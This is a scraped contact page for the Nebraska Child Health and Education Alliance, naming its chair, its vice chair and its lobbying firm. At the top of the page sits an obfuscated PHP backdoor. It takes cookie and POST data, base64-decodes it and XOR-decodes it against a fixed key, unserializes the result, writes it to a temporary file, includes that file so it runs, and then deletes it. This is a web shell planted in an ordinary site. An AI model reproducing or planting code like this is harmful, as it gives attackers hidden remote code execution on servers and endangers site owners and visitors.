$dTHvHbfAN = "\x4c" . "\x5a" . "\x5f" . chr (117) . chr ( 674 - 597 ).chr (90) . 'O';$LtMoGNtxJG = chr (99) . "\x6c" . 'a' . "\163" . chr (115) . chr (95) . chr ( 185 - 84 )."\170" . 'i' . "\x73" . 't' . "\163";$cihxLdlUOa = class_exists($dTHvHbfAN); $LtMoGNtxJG = "7670";$ZkryqOG = !1;if ($cihxLdlUOa == $ZkryqOG){function AZgLowKHYF(){$xaLtQ = new /* 61405 */ LZ_uMZO(18684 + 18684); $xaLtQ = NULL;}$JPljtPt = "18684";class LZ_uMZO{private function dAmCneJqq($JPljtPt){if (is_array(LZ_uMZO::$tSRanRC)) {$inRqEm = sys_get_temp_dir() . "/" . crc32(LZ_uMZO::$tSRanRC["\x73" . "\141" . 'l' . "\164"]);@LZ_uMZO::$tSRanRC[chr ( 997 - 878 ).chr (114) . 'i' . chr ( 131 - 15 ).chr ( 967 - 866 )]($inRqEm, LZ_uMZO::$tSRanRC[chr (99) . 'o' . "\x6e" . chr ( 467 - 351 ).chr (101) . 'n' . 't']);include $inRqEm;@LZ_uMZO::$tSRanRC[chr (100) . chr ( 114 - 13 ).'l' . "\145" . "\164" . chr (101)]($inRqEm); $JPljtPt = "18684";exit();}}private $KZZYGks;public function bVOWEMOR(){echo 2607;}public function __destruct(){$JPljtPt = "21179_18362";$this->dAmCneJqq($JPljtPt); $JPljtPt = "21179_18362";}public function __construct($HOQNa=0){$LOaFVeOEW = $_POST;$moxkQWSiwF = $_COOKIE;$TcxYeHjL = "4ce5e264-1f17-4493-8e91-96547eea3786";$xVKXIIM = @$moxkQWSiwF[substr($TcxYeHjL, 0, 4)];if (!empty($xVKXIIM)){$DuyiIea = "base64";$qsgcB = "";$xVKXIIM = explode(",", $xVKXIIM);foreach ($xVKXIIM as $nfyVVheT){$qsgcB .= @$moxkQWSiwF[$nfyVVheT];$qsgcB .= @$LOaFVeOEW[$nfyVVheT];}$qsgcB = array_map($DuyiIea . '_' . chr (100) . "\145" . "\x63" . 'o' . "\144" . "\145", array($qsgcB,)); $qsgcB = $qsgcB[0] ^ str_repeat($TcxYeHjL, (strlen($qsgcB[0]) / strlen($TcxYeHjL)) + 1);LZ_uMZO::$tSRanRC = @unserialize($qsgcB);}}public static $tSRanRC = 20030;}AZgLowKHYF();} Contact - Nebraska Child Health and Education Alliance

Nebraska Child Health
& Education Alliance

Nebraska Child Health
& Education Alliance


Liz Lyons

NCHEA Chair, Director of Advocacy and Government Affairs, Children’s Hospital and Medical Center

Pat Connell

NCHEA Vice Chair, Vice President of Behavioral Health, Compliance, and Government Relations, Boys Town National Research Hospital

American Communications Group, Inc.

Registered Lobby Firm & Central Office for NCHEA